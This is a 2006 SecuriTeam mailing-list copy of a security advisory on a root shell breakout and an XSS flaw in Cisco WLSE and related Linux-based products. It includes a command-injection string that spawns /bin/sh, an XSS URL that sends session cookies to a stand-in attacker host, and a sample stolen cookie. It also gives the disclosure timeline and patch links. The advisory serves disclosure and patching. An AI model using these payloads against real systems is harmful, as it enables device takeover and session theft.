From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 2 May 2006 10:56:22 +0200
Subject: [UNIX] Multiple Vulnerabilities in Linux Based Cisco Products
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060502085912.83BB257A8@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Vulnerabilities in Linux Based Cisco Products
------------------------------------------------------------------------
SUMMARY
The following vulnerabilities have been discovered in various Cisco Linux
based products:
* A Vulnerability in the CiscoWorks WLSE "show" CLI application allows
execution of arbitrary code as the root user.
* Cross-site scripting flaw allows session theft
DETAILS
Software:
* Cisco Wireless Lan Solution Engine (WLSE)
* Cisco Hosting Solution Engine (HSE)
* Cisco Ethernet Subscriber Solution Engine (ESSE)
* Cisco User Registration Tool (URT)
* CiscoWorks2000 Service Management Solution (SMS)
* Cisco Vlan Policy Server (VPS)
* Cisco Management Engine (ME1100 Series)
* CiscoWorks Service Level Manager (SLM)
Vulnerability information:
(1) The Cisco shell presents the administrator with a restricted set of
commands which includes a "show" application. The "show" application has
several vulnerabilities which allow an attacker to "break out" of the
shell and execute commands (including /bin/sh) as the root user.
This "show" application has been in use on this Linux-based platform build
since 1999 and exists on several other Linux-based Cisco products.
Example:
An Administrator is logged into the Cisco WLSE via either Telnet or SSH.
admin@wlse: show version
(C) Copyright 2005 by Cisco Systems Inc.
WLSE 1130 Release 2.11FCS Thu Apr 14 00:09:56 UTC 2005
Device Limit = 2550
Build Version (67) Tue Mar 15 18:13:02 UTC 2005
Uptime: 2 days 3 hours 32 mins
Linux version 2.4.28-5_WLSEsmp ([email protected]) (gcc version 2.96
20000731
(Red Hat Linux 7.3 2.96-113)) #1 SMP Mon Jan 31 16:04:20 PST 2005
1130
Intel(R) CPU at 3065.897 Mhz with 3105924K bytes of memory.
admin@wlse: show syslog include ";/bin/sh -i;"
sh-2.05a# id
uid=0(root) gid=502(admin) groups=502(admin),500(enable)
At this point the administrator has root level access to the Linux-based
Cisco device.
(2) A cross-site scripting flaw exists in:
/wlse/configure/archive/archiveApplyDisplay.jsp with the "displayMsg"
parameter. This can be used to steal the JSP session cookie, therefore
giving a targeted attacker admin level access to the system. Once the
attacker has admin web GUI access to the system via the XSS, they can then
change the admin password or create a new admin user (without requiring
the admin password).
The attacker can then use the aforementioned "show cli" local root
vulnerability to gain complete control of the Cisco Linux-Based system.
As with (1) above Telnet or SSH access is required to login with the newly
created user with admin level access in order to exploit the "show cli"
bug.
Example:
http://cisco-wlse.example.org/wlse/configure/archive/ \
archiveApplyDisplay.jsp?displayMsg=<script>document.location='http:// \
attacker.example.org?'+document.cookie</script>
The cookie posted to attacker.example.org includes the JSESSIONID token:
ORIG_URL=cisco-wlse.example.org; browser_tzoffset=-660; \
JSESSIONID=johjehk2h1; \
HSE_TKT=admin:1133234898:17e5187e228ab1546ac26ef4ecacf689
When combined with vulnerability (1), it allows a targeted attacker to
gain root access to the Linux system.
Solution:
Cisco has released patches for the vulnerabilities.
Cisco advisory note:
<http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml>;
http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml
Cisco security response:
<http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml>;
http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml
Disclosure timeline:
30-Dec-2005 - Discovered during configuration for a customer
29-Jan-2006 - Email sent to psirt[at]cisco.com with full technical details
31-Jan-2006 - Response received from Cisco psirt
01-Feb-2006 - Cisco advises bug reports have been opened for both issues
05-Apr-2006 - Cisco releases patches to Assurance.com.au for testing
19-Apr-2006 - Advisory released
ADDITIONAL INFORMATION
The information has been provided by
<mailto:[email protected]> assurance.com.au.
The original article can be found at:
<http://www.assurance.com.au/advisories/200604-cisco.txt>;
http://www.assurance.com.au/advisories/200604-cisco.txt
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
